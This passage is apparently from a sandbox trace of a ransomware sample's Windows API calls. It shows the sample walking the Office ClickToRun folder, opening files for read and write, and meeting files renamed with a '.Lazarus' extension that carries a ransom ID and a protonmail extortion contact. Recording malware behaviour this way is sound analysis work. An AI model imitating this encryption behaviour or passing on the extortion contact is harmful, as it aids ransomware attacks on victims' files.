(in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0091.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.189] AreFileApisANSI () returned 1 [0091.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0091.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8b9c8 [0091.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x8b9c8, cchWideChar=136 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 136 [0091.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.190] GetFileType (hFile=0x33c) returned 0x1 [0091.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0091.190] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.190] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.190] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.190] CloseHandle (hObject=0x33c) returned 1 [0091.191] AreFileApisANSI () returned 1 [0091.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0091.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8bae0 [0091.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x8bae0, cchWideChar=136 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 136 [0091.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.191] GetFileType (hFile=0x33c) returned 0x1 [0091.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0091.191] CloseHandle (hObject=0x33c) returned 1 [0091.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0091.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0091.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0091.193] AreFileApisANSI () returned 1 [0091.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8bae0 [0091.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x8bae0, cchWideChar=136 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 136 [0091.193] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8f1b08c9, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x1f5ad8)) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0091.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.193] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a330a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a330a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x4b0d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVFileSystemMetadata.dll", cAlternateFileName="APPVFI~1.DLL")) returned 1 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693a0 [0091.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81860 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0091.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0091.194] AreFileApisANSI () returned 1 [0091.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll", lpUsedDefaultChar=0x0) returned 85 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0091.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.194] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0091.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0091.195] AreFileApisANSI () returned 1 [0091.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0091.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81580 [0091.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x81580, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 85 [0091.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.195] GetFileType (hFile=0x33c) returned 0x1 [0091.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0091.195] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.195] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.195] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.196] CloseHandle (hObject=0x33c) returned 1 [0091.196] AreFileApisANSI () returned 1 [0091.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0091.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81a88 [0091.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x81a88, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 85 [0091.196] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.196] GetLastError () returned 0x20 [0091.196] GetLastError () returned 0x20 [0091.196] SetLastError (dwErrCode=0x20) [0091.196] GetLastError () returned 0x20 [0091.196] SetLastError (dwErrCode=0x20) [0091.196] GetLastError () returned 0x20 [0091.196] SetLastError (dwErrCode=0x20) [0091.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0091.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0091.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.197] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a330a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a330a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x2052d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVIntegration.dll", cAlternateFileName="APPVIN~1.DLL")) returned 1 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0091.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.197] AreFileApisANSI () returned 1 [0091.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll", lpUsedDefaultChar=0x0) returned 78 [0091.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0091.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 